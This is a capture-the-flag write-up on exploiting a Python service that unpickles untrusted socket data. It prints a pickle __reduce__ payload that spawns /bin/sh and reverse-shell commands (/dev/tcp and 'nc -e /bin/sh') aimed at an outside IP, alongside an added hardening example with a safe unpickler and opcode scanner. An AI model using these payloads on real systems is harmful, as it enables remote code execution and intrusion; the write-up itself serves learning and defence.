SHX1 : pwn300-bubble_bass

Bubble Bass has a vulnerable service. Can you exploit it and read the flag.txt file?
Server: 34.197.58.21
Port: 9997
Category: Potent Pwnables
Points: 300
Given clue:
self.received = self.request.recv(1024).strip()
self.result = cPickle.loads(self.received)

Solution

Connected to the server..

..the server asks me to add two numbers, and quits w/ 1 second timeout, no time to manually reply.

No problem, wrote a py socket script...

Now clearly it's a Caesar cipher.

Solved w/ my caesar deco..

Caesar... rot=20

Now comes the real challenge..

..the server asks me for a file, tried flag.txt, of course no success.. everything containing *flag* returns "Really? Maybe next time.."

Okay, back to the given clue:

self.received = self.request.recv(1024).strip()  
self.result = cPickle.loads(self.received)  

hmm.. bubble bass.. pickles.. spongebob? hehe..

Found this:

Tried the test exploit:

import subprocess

class RunBinSh(object):
  # pickle stores the (callable, args) pair from __reduce__; loads() calls it
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))

..and got the "Server received" message from the server, but no shell.. we can't see the server raw output, but I'm on the right track 4 sure..
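The two clue lines pass raw socket bytes to cPickle.loads, which is why the __reduce__ callable runs on the server. As an added example (not part of the original writeup or the challenge's code), this is one way to harden such a handler with Python 3's pickle module: an unpickler that refuses every global lookup, plus a pickletools scan that lists code-bearing opcodes without loading the stream. DataOnlyUnpickler, safe_loads, code_opcodes and Probe are hypothetical names, and Probe is a constructed sample that only calls len('abc').

```python
# Added example; all names here are hypothetical, not from the challenge server.
import io
import pickle
import pickletools

# Opcodes that import a name or call something while the stream is loaded.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                "NEWOBJ", "NEWOBJ_EX", "BUILD", "EXT1", "EXT2", "EXT4"}


class DataOnlyUnpickler(pickle.Unpickler):
    """Loads plain containers, strings and numbers; refuses every global."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError("global %s.%s refused" % (module, name))


def safe_loads(data):
    """Replacement for pickle.loads() on bytes read from an untrusted socket."""
    return DataOnlyUnpickler(io.BytesIO(data)).load()


def code_opcodes(data):
    """List code-bearing opcodes by disassembly, without loading the stream."""
    try:
        return sorted({op.name for op, _arg, _pos in pickletools.genops(data)
                       if op.name in CODE_OPCODES})
    except Exception:
        return ["MALFORMED"]


class Probe(object):
    """Constructed sample: __reduce__ names a harmless builtin, len('abc')."""

    def __reduce__(self):
        return (len, ("abc",))


if __name__ == "__main__":
    samples = (("plain data", {"a": 1, "b": [2, 3]}), ("probe", Probe()))
    for label, obj in samples:
        blob = pickle.dumps(obj, protocol=2)
        print(label, "opcodes:", code_opcodes(blob))
        try:
            print("  loaded:", safe_loads(blob))
        except pickle.UnpicklingError as exc:
            print("  rejected:", exc)
```

If the service only needs dicts, lists, strings and numbers, a data-only format such as JSON removes the problem entirely.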

Started nc server locally (nc -vv -l -p 6888) to wait for connections and tried to execute on server side the classic /bin/sh </dev/tcp/175.14.11.121/6888 >&0 2>&0, no success.. the server accepts my command but no connection here, maybe some filtering..

Ok, let's test if nc is enabled on server side.. nc -e /bin/sh 175.14.11.121 6888

Wow!
we got a reverse shell..
now just cat flag.txt 4 the win!

Flag: shellter{CENSORED}

Awesome contest shellterlabs.com.
I arrived too late and could not try the other challs, but the next one can count on me :)

Final exploit